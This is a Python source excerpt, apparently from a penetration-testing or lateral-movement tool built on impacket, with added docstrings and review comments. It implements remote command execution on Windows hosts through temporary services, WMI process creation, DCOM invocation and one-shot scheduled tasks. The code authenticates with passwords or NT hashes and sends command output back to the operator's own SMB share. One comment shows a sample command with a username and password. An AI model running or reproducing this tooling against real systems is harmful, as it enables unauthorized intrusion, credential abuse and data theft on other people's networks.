def execute_fileless(self, data: str) -> None:
    """Run *data* on the target through a short-lived SCM service that pulls a batch file from our share.

    The command line is written into a local ``<random>.bat`` under ``cfg.TMP_PATH`` (the directory
    served as ``self.__share_name``); a remote service whose binary path maps that share and invokes
    the batch file is then created, started, deleted and closed through the existing SCMR binding,
    and ``get_output_fileless`` collects whatever was redirected back to the share.

    Args:
        data: command line to execute; it is appended verbatim to ``self.__shell``.

    Side effects: a local file ``cfg.TMP_PATH / <random>.bat``; on the target, a ``net use``
    mapping of our share and a service named ``self.__serviceName`` (created, started, deleted);
    one debug log line that contains ``self.__password`` in clear text.
    """
    self.__output = gen_random_string(6)
    self.__batchFile = gen_random_string(6) + '.bat'
    # The address the target must reach us on: the local end of the RPC transport's socket.
    local_ip = self.__rpctransport.get_socket().getsockname()[0]
    if self.__retOutput:
        # '^>' is cmd's escaped redirect — presumably so the redirection is preserved when the
        # line is replayed from the batch file rather than applied here; confirm against caller.
        command = self.__shell + data + ' ^> \\\\{}\\{}\\{}'.format(local_ip, self.__share_name, self.__output)
    else:
        command = self.__shell + data
    # The command itself is staged in the batch file; only the path to it goes into the service.
    with open((cfg.TMP_PATH / self.__batchFile), 'w') as batch_file:
        batch_file.write(command)
    logging.debug('Hosting batch file with command: ' + command)
    command = self.__shell + '\\\\{}\\{}\\{}'.format(local_ip, self.__share_name, self.__batchFile)
    #adding creds gets past systems disallowing guest-auth
    # NOTE(review): the '"' opened after '/c' is never closed in this string — confirm intended.
    # NOTE(security): self.__password is embedded in clear text here, so the debug line below
    # writes it to every configured log handler.
    command = '%COMSPEC% /Q /c "net use /persistent:no \\\\{}\\{} /user:{} {} & '.format(local_ip, self.__share_name, self.__username, self.__password) + command
    logging.debug('Command to execute: ' + command)
    # Logged before the call, so this line does not mean the call succeeded.
    logging.debug('Remote service {} created.'.format(self.__serviceName))
    resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
    service = resp['lpServiceHandle']
    try:
        # Also logged before the call (see above).
        logging.debug('Remote service {} started.'.format(self.__serviceName))
        scmr.hRStartServiceW(self.__scmr, service)
    except:
        # Bare except: any error from hRStartServiceW (a refused/blocked start, a dropped
        # connection, anything) is discarded, and the log cannot distinguish success from failure.
        pass
    # Delete/close run regardless of whether the start succeeded; they are not in a finally,
    # so an exception from hRCreateServiceW above leaves nothing to clean up here.
    logging.debug('Remote service {} deleted.'.format(self.__serviceName))
    scmr.hRDeleteService(self.__scmr, service)
    scmr.hRCloseServiceHandle(self.__scmr, service)
    self.get_output_fileless()
def execute_fileless(self, data: str) -> None:
    """Run *data* on the target via ``Win32_Process.Create``, sending output back to our SMB share.

    The command line redirects stdout and stderr to ``\\<local_ip>\<share>\<random>`` and is
    wrapped in a ``net use`` that first drops the target's existing mappings and then maps our
    share with the stored username/password; ``get_output_fileless`` then reads the result.

    Args:
        data: command line to execute; appended verbatim to ``self.__shell``.

    Side effects: a WMI-spawned process on the target; the target's existing network mappings
    are torn down (``net use * /d /y``); ``/savecred`` asks Windows to keep the supplied credential
    on the target (an artifact that outlives the command — confirm); one debug log line that
    contains ``self.__password`` in clear text.
    """
    self.__output = gen_random_string(6)
    # Address the target will connect back to: the local end of our SMB server's socket.
    local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]
    # Inner command with stdout+stderr redirected to a file on our share.
    commandData = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip, self.__share_name, self.__output)
    #commandData = data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip,
    #                                                  self.__share_name,
    #                                                  self.__output)
    #adding creds gets past systems disallowing guest-auth
    # cmd.exe /Q /c "net use \\10.10.33.200\CAJKY /savecred /p:no /user:agrande User!23 & cmd.exe /Q /c whoami 1> \\10.10.33.200\CAJKY\QYkvxb 2>&1
    # Outer wrapper: drop all existing mappings, map our share with explicit credentials,
    # then run the inner command. Note self.__shell appears three times in the final string.
    command = self.__shell + '"net use * /d /y & '
    # NOTE(security): self.__password is interpolated in clear text and ends up in the debug log below.
    command += self.__shell + 'net use \\\\{}\\{} /savecred /p:no /user:{} {} & {} "'.format(local_ip, self.__share_name, self.__username, self.__password, commandData)
    #command += 'net use \\\\{}\\{} /savecred /p:no /user:{} {}"'.format(local_ip,
    #                                                                     self.__share_name,
    #                                                                     self.__username,
    #                                                                     self.__password
    #                                                                     )
    logging.debug('wmi Executing_fileless command: {}'.format(command))
    # Return value of Create (process id / status) is not inspected, so a failed spawn is not detected here.
    self.__win32Process.Create(command, self.__pwd, None)
    self.get_output_fileless()
def execute_remote(self, data: str) -> None:
    """Run *data* on the target via ``Win32_Process.Create``, capturing output into a file under ``\\Windows\\Temp``.

    When ``self.__retOutput`` is set, stdout and stderr are redirected to
    ``\\\\127.0.0.1\\<share><output>`` on the target itself (a loopback UNC path), and
    ``get_output_remote`` retrieves that file afterwards.

    Args:
        data: command line to execute; appended verbatim to ``self.__shell``.

    Side effects: a WMI-spawned process on the target and, with output enabled, a file
    ``\\Windows\\Temp\\<random>`` on the target (its removal is up to ``get_output_remote``).
    """
    self.__output = '\\Windows\\Temp\\' + gen_random_string(6)
    command = self.__shell + data
    if self.__retOutput:
        # '%' binds tighter than '+': the share name is formatted first, then the output path appended.
        command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1'
    logging.debug('wmi Executing_remote command: ' + command)
    # Create's return value is not checked; spawn failures surface only as missing output.
    self.__win32Process.Create(command, self.__pwd, None)
    self.get_output_remote()
def execute_fileless(self, data: str) -> None:
    """Run *data* on the target via ``Win32_Process.Create`` with output redirected to our SMB share.

    The inner command redirects stdout and stderr to ``\\<local_ip>\<share>\<random>``; it is
    wrapped in a ``net use`` that maps our share with the stored username/password before running.
    ``get_output_fileless`` collects the result.

    Args:
        data: command line to execute; appended verbatim to ``self.__shell``.

    Side effects: a WMI-spawned process and a share mapping on the target; one debug log line
    that contains ``self.__password`` in clear text.
    """
    self.__output = gen_random_string(6)
    # Address the target will connect back to: the local end of our SMB server's socket.
    local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]
    command = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip, self.__share_name, self.__output)
    #adding creds gets past systems disallowing guest-auth
    # NOTE(security): self.__password is interpolated in clear text and is logged on the debug line below.
    command = self.__shell + '"net use \\\\{}\\{} /p:no /user:{} {} & {} "'.format(local_ip, self.__share_name, self.__username, self.__password, command)
    logging.debug('wmi Executing_fileless command: {}'.format(command))
    # Create's return value is not checked; spawn failures surface only as missing output.
    self.__win32Process.Create(command, self.__pwd, None)
    self.get_output_fileless()
def execute_fileless(self, data: str) -> None:
    """Run *data* on the target via ``Win32_Process.Create``, redirecting output to our SMB share.

    Unlike the credentialed variants, no ``net use`` is issued: the redirect relies on the target
    being able to write to ``\\<local_ip>\<share>`` as-is. ``get_output_fileless`` reads the result.

    Args:
        data: command line to execute; appended verbatim to ``self.__shell``.

    Side effects: a WMI-spawned process on the target; the full command line is written to the debug log.
    """
    self.__output = gen_random_string(6)
    # Address the target will connect back to: the local end of our SMB server's socket.
    local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]
    # Always redirects, regardless of self.__retOutput (unlike execute_remote).
    command = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip, self.__share_name, self.__output)
    logging.debug('wmi Executing_fileless command: {}'.format(command))
    # Create's return value is not checked; spawn failures surface only as missing output.
    self.__win32Process.Create(command, self.__pwd, None)
    self.get_output_fileless()
def execute_remote(self, data: str) -> None:
    """Run *data* on the target by invoking the DCOM method held in ``self.__executeShellCommand``.

    Four BSTR arguments are marshalled into a ``DISPPARAMS`` — the shell (``self.__shell``), the
    working directory (``self.__pwd``), the ``/Q /c ...`` argument string, and the literal ``'7'`` —
    and dispatched with ``Invoke``. With ``self.__retOutput`` set, stdout and stderr are redirected
    to ``\\<local_ip>\<share>\<random>`` and ``get_output_fileless`` reads them back.

    Args:
        data: command line to execute; prefixed with ``'/Q /c '`` rather than ``self.__shell``
            here, since the shell is passed as a separate argument.

    Side effects: a process spawned on the target through DCOM. Despite the method name, the output
    path is our share and the *fileless* reader is used; confirm that is intended.
    """
    self.__output = gen_random_string(6)
    # Address the target will connect back to: the local end of our SMB server's socket.
    local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]
    command = '/Q /c ' + data
    if self.__retOutput is True:
        command += ' 1> ' + '\\\\{}\\{}\\{}'.format(local_ip, self.__share_name, self.__output) + ' 2>&1'
    dispParams = DISPPARAMS(None, False)
    dispParams['rgdispidNamedArgs'] = NULL
    dispParams['cArgs'] = 4
    dispParams['cNamedArgs'] = 0
    # arg0: the shell executable string.
    arg0 = VARIANT(None, False)
    arg0['clSize'] = 5
    arg0['vt'] = VARENUM.VT_BSTR
    arg0['_varUnion']['tag'] = VARENUM.VT_BSTR
    arg0['_varUnion']['bstrVal']['asData'] = self.__shell
    # arg1: working directory.
    arg1 = VARIANT(None, False)
    arg1['clSize'] = 5
    arg1['vt'] = VARENUM.VT_BSTR
    arg1['_varUnion']['tag'] = VARENUM.VT_BSTR
    arg1['_varUnion']['bstrVal']['asData'] = self.__pwd
    # arg2: the argument string built above.
    arg2 = VARIANT(None, False)
    arg2['clSize'] = 5
    arg2['vt'] = VARENUM.VT_BSTR
    arg2['_varUnion']['tag'] = VARENUM.VT_BSTR
    arg2['_varUnion']['bstrVal']['asData'] = command
    # arg3: the literal '7' — its meaning depends on the invoked method's signature; not
    # documented here, confirm against the target interface.
    arg3 = VARIANT(None, False)
    arg3['clSize'] = 5
    arg3['vt'] = VARENUM.VT_BSTR
    arg3['_varUnion']['tag'] = VARENUM.VT_BSTR
    arg3['_varUnion']['bstrVal']['asData'] = '7'
    # Arguments are appended last-to-first (arg3 .. arg0); presumably the rgvarg right-to-left convention.
    dispParams['rgvarg'].append(arg3)
    dispParams['rgvarg'].append(arg2)
    dispParams['rgvarg'].append(arg1)
    dispParams['rgvarg'].append(arg0)
    # __executeShellCommand looks like an (IDispatch object, DISPID) pair; 0x409 is the en-US LCID.
    # The Invoke result is not inspected, so a failed dispatch is not detected here.
    self.__executeShellCommand[0].Invoke(self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [])
    self.get_output_fileless()
def __init__(self, host, share_name, protocol, username: str = '', password: str | None = '', domain: str = '', hashes: str | None = None, share=None, port: int = 445) -> None:
    """Store connection parameters and split an optional ``LM:NT`` hash pair; performs no I/O.

    Args:
        host: target host.
        share_name: name of the share we serve output through.
        protocol: accepted but not used anywhere in this constructor.
        username, password, domain: credentials for the target.
        hashes: ``'LMHASH:NTHASH'`` or a bare NT hash; split into ``__lmhash`` / ``__nthash``.
            A value with more than one ``':'`` raises ``ValueError`` from the tuple unpacking.
        share: remote share name (meaning depends on the execute methods; see their docstrings).
        port: SMB port.
    """
    self.__host = host
    self.__share_name = share_name
    self.__port = port
    self.__username = username
    self.__password = password
    # Random name for the service this class creates on the target later.
    self.__serviceName = gen_random_string()
    self.__domain = domain
    self.__lmhash = ''
    self.__nthash = ''
    self.__share = share
    self.__output = None
    self.__batchFile = None
    self.__outputBuffer = ''
    # Plain 'cmd.exe' here, unlike the sibling constructor that uses '%COMSPEC%'.
    self.__shell = 'cmd.exe /Q /c '
    self.__retOutput = False
    self.__rpctransport = None
    self.__scmr = None
    self.__conn = None
    self.__mode = 'SHARE'
    #self.__aesKey = aesKey
    #self.__doKerberos = doKerberos
    if hashes is not None:
        #This checks to see if we didn't provide the LM Hash
        if hashes.find(':') != -1:
            self.__lmhash, self.__nthash = hashes.split(':')
        else:
            self.__nthash = hashes
    #since we might have not passed in a pass and used a hash instead
    if self.__password is None:
        self.__password = ''
def __init__(self, host, share_name, protocol, username: str = '', password: str | None = '', domain: str = '', hashes: str | None = None, share=None, port: int = 445) -> None:
    """Store connection parameters, then connect to the target's SCM over the ``svcctl`` named pipe.

    Unlike a plain constructor this one does network I/O: it builds a DCE/RPC transport for
    ``ncacn_np:<host>[\\pipe\\svcctl]``, authenticates with the given password or hashes,
    binds to SCMR and opens the Service Control Manager, keeping the handle in ``__scHandle``.
    Any failure on that path propagates out of ``__init__``.

    Args:
        host: target host.
        share_name: name of the share we serve output through.
        protocol: accepted but not used anywhere in this constructor.
        username, password, domain: credentials for the target.
        hashes: ``'LMHASH:NTHASH'`` or a bare NT hash; a value with more than one ``':'``
            raises ``ValueError`` from the tuple unpacking.
        share: remote share name (used by the execute methods).
        port: SMB port passed to ``set_dport``.

    Side effects: an authenticated SMB session and an open SCM handle on the target.
    """
    self.__host = host
    self.__share_name = share_name
    self.__port = port
    self.__username = username
    self.__password = password
    # Random name for the service created on the target later.
    self.__serviceName = gen_random_string()
    self.__domain = domain
    self.__lmhash = ''
    self.__nthash = ''
    self.__share = share
    self.__output = None
    self.__batchFile = None
    self.__outputBuffer = ''
    self.__shell = '%COMSPEC% /Q /c '
    self.__retOutput = False
    self.__rpctransport = None
    self.__scmr = None
    self.__conn = None
    self.__mode = 'SHARE'
    # need to figure out the smbserver_dir(ectory) that we can always write too
    #self.__aesKey = aesKey
    #self.__doKerberos = doKerberos
    if hashes is not None:
        #This checks to see if we didn't provide the LM Hash
        if hashes.find(':') != -1:
            self.__lmhash, self.__nthash = hashes.split(':')
        else:
            self.__nthash = hashes
    #since we might have not passed in a pass and used a hash instead
    if self.__password is None:
        self.__password = ''
    # --- network setup starts here ---
    stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % self.__host
    logging.debug('StringBinding %s'%stringbinding)
    self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
    self.__rpctransport.set_dport(self.__port)
    if hasattr(self.__rpctransport, 'setRemoteHost'):
        self.__rpctransport.setRemoteHost(self.__host)
    #if hasattr(self.__rpctransport,'preferred_dialect'):
    #    self.__rpctransport.preferred_dialect(SMB_DIALECT)
    if hasattr(self.__rpctransport, 'set_credentials'):
        # This method exists only for selected protocol sequences.
        self.__rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
    #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
    self.__scmr = self.__rpctransport.get_dce_rpc()
    self.__scmr.connect()
    # Local alias for the underlying SMB connection; only used to set the timeout below.
    s = self.__rpctransport.get_smb_connection()
    # We don't wanna deal with timeouts from now on.
    s.setTimeout(100000)
    self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
    resp = scmr.hROpenSCManagerW(self.__scmr)
    # Handle every later service create/delete goes through; never closed in this class as shown.
    self.__scHandle = resp['lpScHandle']
def doStuff(self, command, fileless: bool = False) -> None:
    """Run *command* on the target through a one-shot scheduled task and collect its output.

    Flow: bind a fresh DCE/RPC connection to the Task Scheduler (``tsch``), register a task named
    ``\\<random>`` from the XML ``self.gen_xml`` produces, run it, poll ``SchRpcGetLastRunInfo``
    until a last-run time is reported, delete the task, then — if ``self.__retOutput`` — read the
    result either from our local hosted directory (``fileless``) or from ``ADMIN$\\Temp\\<random>.tmp``
    on the target, deleting the remote file afterwards.

    Args:
        command: passed through to ``self.gen_xml``; its type is whatever gen_xml expects.
        fileless: when true, output is read from ``/tmp/cmx_hosted/<random>.tmp`` locally
            instead of from the target's ``ADMIN$`` share.

    Raises:
        Whatever the RPC calls raise; in the non-fileless read loop every exception other than a
        sharing-violation or object-not-found message is re-raised.

    Side effects / artifacts on the target: task registration, run and deletion events, and a
    temporary file under ``ADMIN$\\Temp`` (removed on the success path only). ``dce.disconnect()``
    is not in a ``finally``, so an exception leaves the RPC connection open.
    """
    dce = self.__rpctransport.get_dce_rpc()
    dce.set_credentials(*self.__rpctransport.get_credentials())
    dce.connect()
    #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
    dce.bind(tsch.MSRPC_UUID_TSCHS)
    tmpName = gen_random_string(8)
    tmpFileName = tmpName + '.tmp'
    xml = self.gen_xml(command, tmpFileName, fileless)
    #logging.info("Task XML: {}".format(xml))
    taskCreated = False
    logging.info('Creating task \\%s' % tmpName)
    # No try/except around registration, so taskCreated is never consulted on the error path.
    tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
    taskCreated = True
    logging.info('Running task \\%s' % tmpName)
    tsch.hSchRpcRun(dce, '\\%s' % tmpName)
    done = False
    # Unbounded poll: if the task never reports a run time this loop does not terminate.
    while not done:
        logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
        resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
        # A zero year is treated as "has not run yet".
        if resp['pLastRuntime']['wYear'] != 0:
            done = True
        else:
            sleep(2)
    logging.info('Deleting task \\%s' % tmpName)
    tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
    taskCreated = False
    # Dead branch: taskCreated was set False on the line above, so this second delete never runs.
    if taskCreated is True:
        tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
    if self.__retOutput:
        if fileless:
            # Wait (without bound) for the target to write the file into our hosted directory.
            while True:
                try:
                    with open(os.path.join('/tmp', 'cmx_hosted', tmpFileName), 'r') as output:
                        self.output_callback(output.read())
                    break
                except IOError:
                    sleep(2)
        else:
            # Computed but never used.
            peer = ':'.join(map(str, self.__rpctransport.get_socket().getpeername()))
            smbConnection = self.__rpctransport.get_smb_connection()
            # Retry (without bound) while the file is still being written or does not exist yet.
            while True:
                try:
                    #logging.info('Attempting to read ADMIN$\\Temp\\%s' % tmpFileName)
                    smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, self.output_callback)
                    break
                except Exception as e:
                    # Note the asymmetry: '> 0' misses a 'SHARING' match at offset 0, '>= 0' does not.
                    if str(e).find('SHARING') > 0:
                        sleep(3)
                    elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
                        sleep(3)
                    else:
                        raise
            #logging.debug('Deleting file ADMIN$\\Temp\\%s' % tmpFileName)
            smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
    dce.disconnect()